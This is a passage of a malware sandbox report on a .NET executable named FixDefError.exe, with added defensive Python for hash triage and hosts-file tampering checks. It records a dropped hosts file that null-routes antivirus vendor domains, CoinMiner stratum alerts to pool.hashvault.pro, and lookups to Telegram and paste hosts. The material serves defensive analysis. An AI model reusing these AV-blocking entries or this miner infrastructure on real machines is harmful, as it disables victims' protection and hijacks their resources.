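        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Entropy (8bit)": shannon_entropy(data),
    }


def matches_record(data, record):
    """True when bytes pulled from disk agree with a record's listed hashes."""
    fp = fingerprint(data)
    return all(fp[k] == record[k] for k in ("MD5", "SHA1", "SHA-256") if k in record)


def triage(record):
    """Reasons a dropped file deserves a closer look (empty list = noise)."""
    reasons = []
    if record.get("Malicious") == "true":
        reasons.append("flagged malicious by sandbox")
    is_exe = "executable" in record.get("File Type", "").lower()
    if is_exe and float(record.get("Entropy (8bit)", 0)) >= ENTROPY_PACKED:
        reasons.append("high-entropy executable (packed or encrypted payload)")
    for engine, pct in record.get("av", []):
        if pct > 0:
            reasons.append(f"{engine} detection {pct}%")
    return reasons


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_RECORDS):
        print(rec["MD5"], rec["File Type"], triage(rec) or "noise")
```

Run against the full report text, the parser yields one dict per record and `triage` separates the svchost ETL logs and the one-byte PowerShell artifacts from the dropped PE. `matches_record(open(path, "rb").read(), rec)` is the check to run after pulling a file from the analysis VM, before uploading it anywhere, so that a truncated or renamed copy is not mistaken for the sample.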
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11008348563804743
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                  MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                  SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                  SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                  SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11255444863100625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                  MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                  SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                  SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                  SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65536
                                                                                                                  Entropy (8bit):0.11226972425315478
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                  MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                  SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                  SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                  SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                  Malicious:false
                                                                                                                  Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8192
                                                                                                                  Entropy (8bit):3.316154307964996
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:DC71Copo+FP53T9ah2YSFCcbSI2lQvkfM4gOT2EYFzjUMC66JRW:W79raw+62y1fCVw
                                                                                                                  MD5:4CF13DC20FD1BCD6838CAC8881A01737
                                                                                                                  SHA1:6B3D0F4953812D697E459925D1AB88315BBDCFF4
                                                                                                                  SHA-256:0BE7297588FB8B312E20BCB27575C40538659A3B96D0DCD3CE4D131D084A1AF6
                                                                                                                  SHA-512:0E6B8E9A88F3D0679F93A484FAEB98083C2A015177E687BDB59DFA33A797213D89FCFFEC3932E08E44FA470081A010162E933055F259EC0BE11C67D9F5836F27
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... ... ....................................... ...!...............................P.....g......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................WW...... ......Td.2Z..........8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.3.0.3.1.9._.0.7.1.7.2.4._.2.7.7...e.t.l.........P.P.....P.....g.....................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1716
                                                                                                                  Entropy (8bit):4.530975095186605
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:vDZhyoZWM9rU5fFcJrWirF481Yws9hCXu5RC:vDZEurK9UrHh481Yws9oXu5RC
                                                                                                                  MD5:461BAE7420051BED72CE164F6F1C498B
                                                                                                                  SHA1:AAD0052A3377DC02FB86E6D9C91E43D7FE1F901F
                                                                                                                  SHA-256:E9EF2F7E0207DA969485B9EA8E973E24F025A52511DFE2C25BE19DC26076F68F
                                                                                                                  SHA-512:ADD15C7424B09CDB52DCB121C99E9C355287F025D438FEA70A366760F6968CE896D285A283683A4948B1602CE3160DA32835805B287916642422E2FD9C39A6B3
                                                                                                                  Malicious:true
                                                                                                                  Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com..0.0.0.0 kaspersky.com.0.0.0.0 www.kaspersky.com..0.0.0.0 avast.com.0.0.0.0 www.avast.com..0.0.0.0 av
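The dropped file above is the victim's hosts file rewritten so that security-vendor domains resolve to 0.0.0.0, which silently blocks updates and cloud lookups for those products. The following is an added example for triaging such a file, not code from the report or from the sample: it parses a hosts file the way the resolver does (comments, inline comments, CRLF, several names per line), lists every name null-routed to 0.0.0.0 or loopback other than the stock loopback names, and matches those against a watchlist of domains. The sample file content and the watchlist are constructed here, modelled on the preview shown; a real watchlist would carry the analyst's full set of vendor and telemetry domains.

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed sample modelled on the dropped file's preview: the stock Microsoft header
# (commented out, CRLF line endings) followed by 0.0.0.0 entries for security vendors.
SAMPLE_HOSTS = (
    "# Copyright (c) 1993-2009 Microsoft Corp.\r\n"
    "#\r\n"
    "# For example:\r\n"
    "#      102.54.94.97     rhino.acme.com          # source server\r\n"
    "#\t127.0.0.1       localhost\r\n"
    "#\t::1             localhost\r\n"
    "0.0.0.0 virustotal.com\r\n"
    "0.0.0.0 www.virustotal.com\r\n"
    "0.0.0.0 kaspersky.com\r\n"
    "0.0.0.0 www.kaspersky.com\r\n"
    "0.0.0.0 avast.com\r\n"
    "0.0.0.0 www.avast.com\r\n"
    "127.0.0.1 localhost\r\n"
    "10.0.0.5 intranet.example # legitimate static entry, must not be flagged\r\n"
)

# Constructed watchlist: domains whose null-routing indicates AV/analysis tampering.
WATCHLIST = ["virustotal.com", "kaspersky.com", "avast.com"]

NULL_ROUTE_ADDRS = {"0.0.0.0", "127.0.0.1", "::1", "::"}
# Names a stock hosts file legitimately points at loopback.
STOCK_LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                        "ip6-localhost", "ip6-loopback"}


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs for every active mapping.

    Blank lines, full-line and inline '#' comments are skipped, as are lines whose
    first field is not a valid IP address (the resolver ignores those too).
    """
    entries: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue
        for host in fields[1:]:
            entries.append((addr, host.lower().rstrip(".")))
    return entries


def find_null_routed(entries: List[Tuple[str, str]]) -> Dict[str, str]:
    """Hostnames mapped to a null or loopback address, excluding the stock loopback names."""
    return {host: addr for addr, host in entries
            if addr in NULL_ROUTE_ADDRS and host not in STOCK_LOOPBACK_NAMES}


def match_watchlist(null_routed: Dict[str, str], watchlist: List[str]) -> List[str]:
    """Null-routed names that equal, or are subdomains of, a watchlist domain (sorted)."""
    domains = [d.lower().lstrip(".") for d in watchlist]
    return sorted(h for h in null_routed
                  if any(h == d or h.endswith("." + d) for d in domains))


if __name__ == "__main__":
    routed = find_null_routed(parse_hosts(SAMPLE_HOSTS))
    for host, addr in sorted(routed.items()):
        print(f"{addr:>10}  {host}")
    print("watchlist hits:", match_watchlist(routed, WATCHLIST))
```

Any null-routed name that is not a stock loopback entry is worth a look even when it misses the watchlist: the first report of a new AV-blocking variant usually comes from an unfamiliar domain in exactly this position.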
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):916
                                                                                                                  Entropy (8bit):6.006091656254043
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..
                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):5.7415841018358895
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:FixDefError.exe
                                                                                                                  File size:2393088
                                                                                                                  MD5:1b664f2a0bede6c47e44ca8c0aad3de7
                                                                                                                  SHA1:2dc3169220411d03be438047a3c33696b4371d2b
                                                                                                                  SHA256:908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
                                                                                                                  SHA512:f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9
                                                                                                                  SSDEEP:24576:d6XFr/AUXPhtHbLLGpMamGEhP+boT/JsGz1UdbA4ZWIWId4gIehzsBgxUsHB:docUPht7XGpMjTPd/J7y5Bd/nv/
                                                                                                                  TLSH:4EB5BF2439FA601EB173EF668BE478E6DA6FB7733B07645A1051038A4723981DEC153E
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n............"...0..x$...........$.. ....$...@.. ........................$...........`................................
                                                                                                                  Icon Hash:00828e8e8686b000
                                                                                                                  Entrypoint:0x6497ce
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
add byte ptr [eax], al    (repeated 97 times: the disassembler reading the zero bytes that follow the 6-byte CLR entry stub; 00 00 decodes as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x24977c         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x24a000         0x6c2         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x24c000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x249730         0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
.text   0x2000           0x2477d4      0x247800  unknown   unknown          unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x24a000         0x6c2         0x800     False     0.359375         data       3.7216609270407237   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x24c000         0xc           0x200     False     0.044921875      data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                                Language  Country
RT_VERSION   0x24a0a0  0x438  data
RT_MANIFEST  0x24a4d8  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                                                  Source Port  Dest Port  Source IP    Dest IP
03/19/23-00:18:14.932574  UDP       2036289  ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)          49977        53         192.168.2.3  8.8.8.8
03/19/23-00:18:15.028582  TCP       2831812  ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)  49697        443        192.168.2.3  95.179.241.203
03/19/23-00:18:02.289189  TCP       2831812  ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)  49696        443        192.168.2.3  95.179.241.203
03/19/23-00:18:02.189431  UDP       2036289  ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)          62704        53         192.168.2.3  8.8.8.8
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Mar 19, 2023 00:17:10.358745098 CET  192.168.2.3  8.8.8.8  0xb62     Standard query (0)  www.google.com             A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:12.141326904 CET  192.168.2.3  8.8.8.8  0x6fbc    Standard query (0)  rentry.co                  A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:12.825360060 CET  192.168.2.3  8.8.8.8  0xdddc    Standard query (0)  api.ipify.org              A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:12.863749981 CET  192.168.2.3  8.8.8.8  0x21f9    Standard query (0)  api.ipify.org              A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:13.983597040 CET  192.168.2.3  8.8.8.8  0x5ee0    Standard query (0)  api.telegram.org           A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:21.492362022 CET  192.168.2.3  8.8.8.8  0x4366    Standard query (0)  github.com                 A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:21.815330982 CET  192.168.2.3  8.8.8.8  0x921e    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:51.195936918 CET  192.168.2.3  8.8.8.8  0x2aab    Standard query (0)  rentry.co                  A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:51.850929976 CET  192.168.2.3  8.8.8.8  0x599a    Standard query (0)  www.google.com             A (IP address)  IN (0x0001)  false
Mar 19, 2023 00:17:59.379724979 CET  192.168.2.3  8.8.8.8  0xa230    Standard query (0)  rentry.co                  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName           Address          Type                    Class        DNS over HTTPS
Mar 19, 2023 00:17:10.397644997 CET  8.8.8.8    192.168.2.3  0xb62     No error (0)  www.google.com                             142.251.209.36   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.161010981 CET  8.8.8.8    192.168.2.3  0x6fbc    No error (0)  rentry.co                                  198.251.88.130   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.844556093 CET  8.8.8.8    192.168.2.3  0xdddc    No error (0)  api.ipify.org              api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 19, 2023 00:17:12.844556093 CET  8.8.8.8    192.168.2.3  0xdddc    No error (0)  api4.ipify.org                             104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.844556093 CET  8.8.8.8    192.168.2.3  0xdddc    No error (0)  api4.ipify.org                             173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.844556093 CET  8.8.8.8    192.168.2.3  0xdddc    No error (0)  api4.ipify.org                             64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.883479118 CET  8.8.8.8    192.168.2.3  0x21f9    No error (0)  api.ipify.org              api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 19, 2023 00:17:12.883479118 CET  8.8.8.8    192.168.2.3  0x21f9    No error (0)  api4.ipify.org                             64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.883479118 CET  8.8.8.8    192.168.2.3  0x21f9    No error (0)  api4.ipify.org                             104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:12.883479118 CET  8.8.8.8    192.168.2.3  0x21f9    No error (0)  api4.ipify.org                             173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:14.000703096 CET  8.8.8.8    192.168.2.3  0x5ee0    No error (0)  api.telegram.org                           149.154.167.220  A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:21.519740105 CET  8.8.8.8    192.168.2.3  0x4366    No error (0)  github.com                                 140.82.121.3     A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:21.834188938 CET  8.8.8.8    192.168.2.3  0x921e    No error (0)  raw.githubusercontent.com                  185.199.111.133  A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:21.834188938 CET  8.8.8.8    192.168.2.3  0x921e    No error (0)  raw.githubusercontent.com                  185.199.110.133  A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:21.834188938 CET  8.8.8.8    192.168.2.3  0x921e    No error (0)  raw.githubusercontent.com                  185.199.108.133  A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:21.834188938 CET  8.8.8.8    192.168.2.3  0x921e    No error (0)  raw.githubusercontent.com                  185.199.109.133  A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:51.215842962 CET  8.8.8.8    192.168.2.3  0x2aab    No error (0)  rentry.co                                  198.251.88.130   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:51.870831966 CET  8.8.8.8    192.168.2.3  0x599a    No error (0)  www.google.com                             142.251.209.36   A (IP address)          IN (0x0001)  false
Mar 19, 2023 00:17:59.399435043 CET  8.8.8.8    192.168.2.3  0xa230    No error (0)  rentry.co                                  198.251.88.130   A (IP address)          IN (0x0001)  false
                                                                                                                  • rentry.co
                                                                                                                  • api.ipify.org
                                                                                                                  • api.telegram.org
                                                                                                                  • github.com
                                                                                                                  • raw.githubusercontent.com
                                                                                                                  • www.google.com

                                                                                                                  Target ID:0
                                                                                                                  Start time:00:17:02
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  Imagebase:0x560000
                                                                                                                  File size:2393088 bytes
                                                                                                                  MD5 hash:1B664F2A0BEDE6C47E44CA8C0AAD3DE7
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:low

                                                                                                                  Target ID:1
                                                                                                                  Start time:00:17:04
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\ProgramStarter.exe"
                                                                                                                  Imagebase:0x750000
